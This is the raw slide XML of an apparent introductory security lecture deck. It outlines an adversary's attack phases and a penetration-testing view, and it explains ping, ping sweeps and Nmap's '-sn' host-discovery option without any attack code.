            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="684213" y="3657600"/>
            <a:ext cx="7848600" cy="2671763"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" charset="0"/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="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p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15363" name="Rectangle 1"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4716463" y="2420938"/>
            <a:ext cx="20065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latin typeface="Times New Roman" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Scanning</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3600" b="1" dirty="0">
              <a:latin typeface="Times New Roman" charset="0"/>
              <a:cs typeface="Arial" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="17938712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2" name="Rectangle 36"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5562600" y="1752600"/>
            <a:ext cx="3048000" cy="3657600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="CCFF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88" name="Text Box 32"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5562600" y="4572000"/>
            <a:ext cx="309245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0000EC"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" charset="0"/>
              </a:rPr>
              <a:t>Penetration Testing Report</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000EC"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" charset="0"/>
              </a:rPr>
              <a:t>(Recommendation for Security</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Times New Roman" charset="0"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="45090" name="Rectangle 34"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2286000" y="1752600"/>
            <a:ext cx="3276600" cy="3657600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="folHlink">
              <a:alpha val="49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91" name="Line 35"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="533400" y="4876800"/>
            <a:ext cx="5181600"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58" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="381000"/>
            <a:ext cx="8229600" cy="1036638"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3600" i="1">
                <a:solidFill>
                  <a:srgbClr val="CC0000"/>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="DDDDDD"/>
                  </a:outerShdw>
                </a:effectLst>
                <a:latin typeface="Times New Roman" charset="0"/>
              </a:rPr>
              <a:t>Perspective of Adversary</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="45060" name="Rectangle 4"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="533400" y="3733800"/>
            <a:ext cx="1752600" cy="6096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latin typeface="Times New Roman" charset="0"/>
              </a:rPr>
              <a:t>Reconnaissance</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="45061" name="Rectangle 5"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2286000" y="3733800"/>
            <a:ext cx="1524000" cy="609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latin typeface="Times New Roman" charset="0"/>
              </a:rPr>
              <a:t>Scanning</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="45062" name="Rectangle 6"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3810000" y="3733800"/>
            <a:ext cx="1752600" cy="6096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80000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000">
                <a:latin typeface="Times New Roman" charset="0"/>
              </a:rPr>
              <a:t>System Access</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="45063" name="Rectangle 7"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5562600" y="3733800"/>
            <a:ext cx="1524000" cy="609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latin typeface="Times New Roman" charset="0"/>
              </a:rPr>
              <a:t>Damage</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="45064" name="Rectangle 8"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7086600" y="3733800"/>
            <a:ext cx="1524000" cy="6096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latin typeface="Times New Roman" charset="0"/>
              </a:rPr>
              <a:t>Clear Tracks</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="45065" name="Text Box 9"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="533400" y="1943100"/>
            <a:ext cx="10318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Web-based</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400">
                <a:latin typeface="Times New Roman" charset="0"/>
              </a:rPr>
              <a:t>Information</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400">
                <a:latin typeface="Times New Roman" charset="0"/>
              </a:rPr>
              <a:t>Collection</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="45066" name="Text Box 10"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1219200" y="2819400"/>
            <a:ext cx="10525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Social</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400">
                <a:latin typeface="Times New Roman" charset="0"/>
              </a:rPr>
              <a:t>Engineering</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="45067" name="Text Box 11"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2390775" y="1943100"/>
            <a:ext cx="8270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Broad</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400">
                <a:latin typeface="Times New Roman" charset="0"/>
              </a:rPr>
              <a:t>Network</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400">
                <a:latin typeface="Times New Roman" charset="0"/>
              </a:rPr>
              <a:t>Mapping</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="45068" name="Text Box 12"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3089275" y="2819400"/>
            <a:ext cx="8159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Targeted</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400">
                <a:latin typeface="Times New Roman" charset="0"/>
              </a:rPr>
              <a:t>Scan</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="45069" name="Text Box 13"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3779838" y="1943100"/>
            <a:ext cx="109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Service</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400">
                <a:latin typeface="Times New Roman" charset="0"/>
              </a:rPr>
              <a:t>vulnerability</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400">
                <a:latin typeface="Times New Roman" charset="0"/>
              </a:rPr>
              <a:t>Exploitation</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="45070" name="Text Box 14"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4587875" y="2819400"/>
            <a:ext cx="8667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Password</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400">
                <a:latin typeface="Times New Roman" charset="0"/>
              </a:rPr>
              <a:t>Cracking</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="45071" name="Text Box 15"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5435600" y="1943100"/>
            <a:ext cx="9842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DDOS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400">
                <a:latin typeface="Times New Roman" charset="0"/>
              </a:rPr>
              <a:t>Code</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400">
                <a:latin typeface="Times New Roman" charset="0"/>
              </a:rPr>
              <a:t>Installation</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="45072" name="Text Box 16"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6107113" y="2819400"/>
            <a:ext cx="10287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System File</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400">
                <a:latin typeface="Times New Roman" charset="0"/>
              </a:rPr>
              <a:t>Deletion</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="45073" name="Text Box 17"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7045325" y="1943100"/>
            <a:ext cx="96043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Use Stolen</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400">
                <a:latin typeface="Times New Roman" charset="0"/>
              </a:rPr>
              <a:t>Accounts</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400">
                <a:latin typeface="Times New Roman" charset="0"/>
              </a:rPr>
              <a:t>For Attack</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="45074" name="Text Box 18"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7821613" y="2819400"/>
            <a:ext cx="7985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New Roman" charset="0"/>
              </a:rPr>
              <a:t>Log File</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400">
                <a:latin typeface="Times New Roman" charset="0"/>
              </a:rPr>
              <a:t>Changes</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="45075" name="Line 19"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="914400" y="2743200"/>
            <a:ext cx="0" cy="9906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76" name="Line 20"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1676400" y="3352800"/>
            <a:ext cx="0" cy="3810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77" name="Line 21"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2743200" y="2743200"/>
            <a:ext cx="0" cy="9906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78" name="Line 22"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3505200" y="3352800"/>
            <a:ext cx="0" cy="3810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79" name="Line 23"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4267200" y="2743200"/>
            <a:ext cx="0" cy="9906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0" name="Line 24"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5029200" y="3352800"/>
            <a:ext cx="0" cy="3810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1" name="Line 25"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5867400" y="2743200"/>
            <a:ext cx="0" cy="9906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2" name="Line 26"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6629400" y="3352800"/>
            <a:ext cx="0" cy="3810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3" name="Line 27"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7467600" y="2743200"/>
            <a:ext cx="0" cy="9906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4" name="Line 28"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="8229600" y="3352800"/>
            <a:ext cx="0" cy="38100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85" name="Text Box 29"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4648200" y="5486400"/>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New Roman" charset="0"/>
              </a:rPr>
              <a:t>Reactive Security</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Times New Roman" charset="0"/>
              </a:rPr>
              <a:t>(Incident Response)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="45086" name="Text Box 30"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2133600" y="5486400"/>
            <a:ext cx="1866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New Roman" charset="0"/>
              </a:rPr>
              <a:t>Proactive Security</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Times New Roman" charset="0"/>
              </a:rPr>
              <a:t>(Real Time)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="45087" name="Text Box 31"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3048000" y="4572000"/>
            <a:ext cx="175260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chemeClr val="tx2">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Times New Roman" charset="0"/>
              </a:rPr>
              <a:t>Preventive Phase</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:schemeClr val="tx2">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Times New Roman" charset="0"/>
              </a:rPr>
              <a:t>(Defense)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="45089" name="Line 33"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5562600" y="4343400"/>
            <a:ext cx="0" cy="1066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93" name="Line 37"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="533400" y="4343400"/>
            <a:ext cx="0" cy="1066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94" name="Line 38"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="8610600" y="4343400"/>
            <a:ext cx="0" cy="1066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5095" name="Line 39"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="2971800" y="5257800"/>
            <a:ext cx="3048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42" name="Line 4"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="457200" y="1524000"/>
            <a:ext cx="8001000" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="50800" cmpd="dbl">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8769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smtClean="0"/>
              <a:t>Scanning </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Tools</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Ping</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Ping Sweep</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Nmap</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="45727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Ping</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>A Ping is when a device sends an Internet Control Message Protocol (ICMP) packet to a specific system in order to elicit a response.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>It is frequently used to test, at the most basic level, whether </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>another system </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>is reachable over a network, and if so, how much time it takes for that data to be exchanged.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3511093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Screen shot 2015-02-18 at 7.23.5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21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008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Ping Sweep</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Ping sweep is just a technique that can be used to find out </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>which </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>hosts are alive in a network or large number of IP addresses</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Nmap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>can </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>also be used to do ping sweeping</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>sn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>option </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>is to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>determine whether the host is up. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Disable port scan.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="28292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creen shot 2015-02-18 at 7.37.4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71450"/>
            <a:ext cx="9118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263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Ping Sweep (cont.)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
